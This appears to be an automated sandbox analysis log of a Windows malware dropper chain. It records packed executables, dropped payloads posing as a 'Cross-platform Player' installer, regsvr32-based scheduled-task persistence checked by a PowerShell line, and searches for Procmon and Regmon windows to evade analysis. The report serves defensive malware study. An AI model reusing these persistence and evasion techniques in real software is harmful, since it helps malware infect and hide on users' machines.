Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Window found: window name: TMainForm Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Cross-platform Player_is1 Jump to behavior
Source: p199AjsEFs.exe Static file information: File size 1861632 > 1048576
Source: p199AjsEFs.exe Static PE information: Raw size of cwtcsdxi is bigger than: 0x100000 < 0x19b200
Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: 264662bead.tmp, 00000010.00000003.3388150366.0000000002150000.00000004.00001000.00020000.00000000.sdmp, 264662bead.tmp, 00000010.00000003.3387702350.00000000034D5000.00000004.00001000.00020000.00000000.sdmp, 264662bead.tmp, 00000010.00000003.3383941896.00000000031A0000.00000004.00001000.00020000.00000000.sdmp, 264662bead.tmp, 00000012.00000003.3397747715.0000000002230000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.16.dr

Data Obfuscation

barindex
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Unpacked PE file: 3.2.HT94GNC6NP3AGR6EM8I9D3647.exe.330000.0.unpack :EW;.rsrc:W;.idata :W; :EW;npkeuccx:EW;rvvqxzxr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;npkeuccx:EW;rvvqxzxr:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Unpacked PE file: 4.2.6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe.ac0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;npzhibgu:EW;dbasugji:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;npzhibgu:EW;dbasugji:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 6.2.skotes.exe.1e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;npzhibgu:EW;dbasugji:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;npzhibgu:EW;dbasugji:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 7.2.skotes.exe.1e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;npzhibgu:EW;dbasugji:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;npzhibgu:EW;dbasugji:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 9.2.skotes.exe.1e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;npzhibgu:EW;dbasugji:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;npzhibgu:EW;dbasugji:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe Unpacked PE file: 14.2.crossplatformplayer.exe.400000.0.unpack .text:EW;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe Unpacked PE file: 14.2.crossplatformplayer.exe.400000.0.unpack
Source: dedicleb.exe.9.dr, ClientManager.cs .Net Code: MeditationMonitor System.AppDomain.Load(byte[])
Source: dedicleb.exe.9.dr, ClientManager.cs .Net Code: MeditationMonitor
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: 264662bead.tmp.15.dr Static PE information: real checksum: 0x0 should be: 0x122532
Source: 264662bead.tmp.17.dr Static PE information: real checksum: 0x0 should be: 0x122532
Source: random[1].exe1.9.dr Static PE information: real checksum: 0x0 should be: 0x16fc42
Source: is-IPK0L.tmp.13.dr Static PE information: real checksum: 0x0 should be: 0x14980c
Source: is-SE3IR.tmp.18.dr Static PE information: real checksum: 0x319701 should be: 0x30ff91
Source: p199AjsEFs.exe Static PE information: real checksum: 0x1c9203 should be: 0x1d327b
Source: 264662bead.exe.9.dr Static PE information: real checksum: 0x0 should be: 0x16fc42
Source: 93f981a153.tmp.12.dr Static PE information: real checksum: 0x0 should be: 0xbc496
Source: is-0867F.tmp.18.dr Static PE information: real checksum: 0x0 should be: 0x1308eb
Source: _setup64.tmp.18.dr Static PE information: real checksum: 0x0 should be: 0x8546
Source: _setup64.tmp.16.dr Static PE information: real checksum: 0x0 should be: 0x8546
Source: dedicleb[1].exe.9.dr Static PE information: real checksum: 0x0 should be: 0x3ca4a
Source: skotes.exe.4.dr Static PE information: real checksum: 0x1d5c9f should be: 0x1d7693
Source: is-GPTU0.tmp.13.dr Static PE information: real checksum: 0x0 should be: 0xb5141
Source: is-DIKDD.tmp.13.dr Static PE information: real checksum: 0x0 should be: 0x1b9553
Source: random[1].exe.9.dr Static PE information: real checksum: 0x1db14d should be: 0x1e0071
Source: 6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe.0.dr Static PE information: real checksum: 0x1d5c9f should be: 0x1d7693
Source: random[1].exe0.9.dr Static PE information: real checksum: 0x0 should be: 0x3886e4
Source: HT94GNC6NP3AGR6EM8I9D3647.exe.0.dr Static PE information: real checksum: 0x1c0bdd should be: 0x1bdc29
Source: dedicleb.exe.9.dr Static PE information: real checksum: 0x0 should be: 0x3ca4a
Source: _iscrypt.dll.13.dr Static PE information: real checksum: 0x0 should be: 0x89d2
Source: _isdecmp.dll.16.dr Static PE information: real checksum: 0x0 should be: 0x5528
Source: _isdecmp.dll.18.dr Static PE information: real checksum: 0x0 should be: 0x5528
Source: 93f981a153.exe.9.dr Static PE information: real checksum: 0x0 should be: 0x3886e4
Source: p199AjsEFs.exe Static PE information: section name:
Source: p199AjsEFs.exe Static PE information: section name: .idata
Source: p199AjsEFs.exe Static PE information: section name:
Source: p199AjsEFs.exe Static PE information: section name: cwtcsdxi
Source: p199AjsEFs.exe Static PE information: section name: vyjhahjk
Source: p199AjsEFs.exe Static PE information: section name: .taggant
Source: HT94GNC6NP3AGR6EM8I9D3647.exe.0.dr Static PE information: section name:
Source: HT94GNC6NP3AGR6EM8I9D3647.exe.0.dr Static PE information: section name: .idata
Source: HT94GNC6NP3AGR6EM8I9D3647.exe.0.dr Static PE information: section name:
Source: HT94GNC6NP3AGR6EM8I9D3647.exe.0.dr Static PE information: section name: npkeuccx
Source: HT94GNC6NP3AGR6EM8I9D3647.exe.0.dr Static PE information: section name: rvvqxzxr
Source: HT94GNC6NP3AGR6EM8I9D3647.exe.0.dr Static PE information: section name: .taggant
Source: 6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe.0.dr Static PE information: section name:
Source: 6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe.0.dr Static PE information: section name: .idata
Source: 6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe.0.dr Static PE information: section name:
Source: 6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe.0.dr Static PE information: section name: npzhibgu
Source: 6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe.0.dr Static PE information: section name: dbasugji
Source: 6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe.0.dr Static PE information: section name: .taggant
Source: skotes.exe.4.dr Static PE information: section name:
Source: skotes.exe.4.dr Static PE information: section name: .idata
Source: skotes.exe.4.dr Static PE information: section name:
Source: skotes.exe.4.dr Static PE information: section name: npzhibgu
Source: skotes.exe.4.dr Static PE information: section name: dbasugji
Source: skotes.exe.4.dr Static PE information: section name: .taggant
Source: random[1].exe.9.dr Static PE information: section name:
Source: random[1].exe.9.dr Static PE information: section name: .idata
Source: random[1].exe.9.dr Static PE information: section name:
Source: random[1].exe.9.dr Static PE information: section name: qqtrmnsk
Source: random[1].exe.9.dr Static PE information: section name: nskkxmzy
Source: random[1].exe.9.dr Static PE information: section name: .taggant
Source: is-DFNTB.tmp.13.dr Static PE information: section name: /4
Source: is-DFNTB.tmp.13.dr Static PE information: section name: /19
Source: is-DFNTB.tmp.13.dr Static PE information: section name: /35
Source: is-DFNTB.tmp.13.dr Static PE information: section name: /51
Source: is-DFNTB.tmp.13.dr Static PE information: section name: /63
Source: is-DFNTB.tmp.13.dr Static PE information: section name: /77
Source: is-DFNTB.tmp.13.dr Static PE information: section name: /89
Source: is-DFNTB.tmp.13.dr Static PE information: section name: /102
Source: is-DFNTB.tmp.13.dr Static PE information: section name: /113
Source: is-DFNTB.tmp.13.dr Static PE information: section name: /124
Source: sqlite3.dll.14.dr Static PE information: section name: /4
Source: sqlite3.dll.14.dr Static PE information: section name: /19
Source: sqlite3.dll.14.dr Static PE information: section name: /35
Source: sqlite3.dll.14.dr Static PE information: section name: /51
Source: sqlite3.dll.14.dr Static PE information: section name: /63
Source: sqlite3.dll.14.dr Static PE information: section name: /77
Source: sqlite3.dll.14.dr Static PE information: section name: /89
Source: sqlite3.dll.14.dr Static PE information: section name: /102
Source: sqlite3.dll.14.dr Static PE information: section name: /113
Source: sqlite3.dll.14.dr Static PE information: section name: /124
Source: is-SE3IR.tmp.18.dr Static PE information: section name: .xdata
Source: is-SE3IR.tmp.18.dr Static PE information: section name: /4
Source: is-SE3IR.tmp.18.dr Static PE information: section name: /19
Source: is-SE3IR.tmp.18.dr Static PE information: section name: /35
Source: is-SE3IR.tmp.18.dr Static PE information: section name: /47
Source: is-SE3IR.tmp.18.dr Static PE information: section name: /61
Source: is-SE3IR.tmp.18.dr Static PE information: section name: /73
Source: is-SE3IR.tmp.18.dr Static PE information: section name: /86
Source: is-SE3IR.tmp.18.dr Static PE information: section name: /97
Source: is-SE3IR.tmp.18.dr Static PE information: section name: /113
Source: is-SE3IR.tmp.18.dr Static PE information: section name: /127
Source: is-SE3IR.tmp.18.dr Static PE information: section name: /143
Source: is-SE3IR.tmp.18.dr Static PE information: section name: /159
Source: C:\Users\user\Desktop\p199AjsEFs.exe Code function: 0_3_055ED4D2 push edx; ret 0_3_055ED4D4
Source: C:\Users\user\Desktop\p199AjsEFs.exe Code function: 0_3_055ED4D2 push edx; ret 0_3_055ED4D4
Source: C:\Users\user\Desktop\p199AjsEFs.exe Code function: 0_3_055EC492 push edx; ret 0_3_055EC494
Source: C:\Users\user\Desktop\p199AjsEFs.exe Code function: 0_3_055EC492 push edx; ret 0_3_055EC494
Source: C:\Users\user\Desktop\p199AjsEFs.exe Code function: 0_3_055EE512 push edx; ret 0_3_055EE514
Source: C:\Users\user\Desktop\p199AjsEFs.exe Code function: 0_3_055EE512 push edx; ret 0_3_055EE514
Source: C:\Users\user\Desktop\p199AjsEFs.exe Code function: 0_3_055ED4D2 push edx; ret 0_3_055ED4D4
Source: C:\Users\user\Desktop\p199AjsEFs.exe Code function: 0_3_055ED4D2 push edx; ret 0_3_055ED4D4
Source: C:\Users\user\Desktop\p199AjsEFs.exe Code function: 0_3_055EC492 push edx; ret 0_3_055EC494
Source: C:\Users\user\Desktop\p199AjsEFs.exe Code function: 0_3_055EC492 push edx; ret 0_3_055EC494
Source: C:\Users\user\Desktop\p199AjsEFs.exe Code function: 0_3_055EE512 push edx; ret 0_3_055EE514
Source: C:\Users\user\Desktop\p199AjsEFs.exe Code function: 0_3_055EE512 push edx; ret 0_3_055EE514
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 9_2_001FD91C push ecx; ret 9_2_001FD92F
Source: p199AjsEFs.exe Static PE information: section name: entropy: 7.9859001084853825
Source: p199AjsEFs.exe Static PE information: section name: cwtcsdxi entropy: 7.954013880613041
Source: HT94GNC6NP3AGR6EM8I9D3647.exe.0.dr Static PE information: section name: npkeuccx entropy: 7.953889894291722
Source: 6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe.0.dr Static PE information: section name: entropy: 7.985334345549936
Source: 6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe.0.dr Static PE information: section name: npzhibgu entropy: 7.953247194647626
Source: skotes.exe.4.dr Static PE information: section name: entropy: 7.985334345549936
Source: skotes.exe.4.dr Static PE information: section name: npzhibgu entropy: 7.953247194647626
Source: random[1].exe.9.dr Static PE information: section name: entropy: 7.984381680379524
Source: random[1].exe.9.dr Static PE information: section name: qqtrmnsk entropy: 7.953843925231993
Source: is-4B81S.tmp.13.dr Static PE information: section name: .text entropy: 6.90903234258047
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\libGLESv2.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp File created: C:\Users\user\AppData\Roaming\uxtheme_2.drv (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\Qt5PrintSupport.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\dedicleb[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe File created: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp File created: C:\Users\user\AppData\Local\Temp\is-6SD2B.tmp\_isetup\_isdecmp.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe File created: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\msvcr100.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-DFNTB.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Temp\is-29I1I.tmp\_isetup\_iscrypt.dll Jump to dropped file
Source: C:\Users\user\Desktop\p199AjsEFs.exe File created: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-4B81S.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Temp\is-29I1I.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\icuin51.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-H4609.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-IPK0L.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp File created: C:\Users\user\AppData\Local\Temp\is-RHTN2.tmp\_isetup\_isdecmp.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp File created: C:\Users\user\AppData\Local\Temp\is-6SD2B.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-3OCBE.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp File created: C:\Users\user\AppData\Local\Temp\is-6SD2B.tmp\_isetup\_shfoldr.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\sqlite3.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp File created: C:\Users\user\AppData\Local\is-0867F.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\libEGL.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp File created: C:\Users\user\AppData\Roaming\is-SE3IR.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1053901001\93f981a153.exe File created: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-DIKDD.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe File created: C:\ProgramData\CrossPlatformPlayer\CrossPlatformPlayer.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1053901001\93f981a153.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\Desktop\p199AjsEFs.exe File created: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp File created: C:\Users\user\AppData\Local\Temp\is-RHTN2.tmp\_isetup\_shfoldr.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\msvcp100.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-56BQJ.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\uninstall\unins000.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp File created: C:\Users\user\AppData\Local\Temp\is-RHTN2.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\icuuc51.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-5TPVM.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\uninstall\is-GPTU0.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\Qt5Concurrent.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Temp\is-29I1I.tmp\_isetup\_shfoldr.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp File created: C:\Users\user\AppData\Local\unins000.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-UO9UR.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe File created: C:\ProgramData\CrossPlatformPlayer\sqlite3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe File created: C:\ProgramData\CrossPlatformPlayer\sqlite3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe File created: C:\ProgramData\CrossPlatformPlayer\CrossPlatformPlayer.exe Jump to dropped file

Boot Survival

barindex
Source: C:\Users\user\Desktop\p199AjsEFs.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
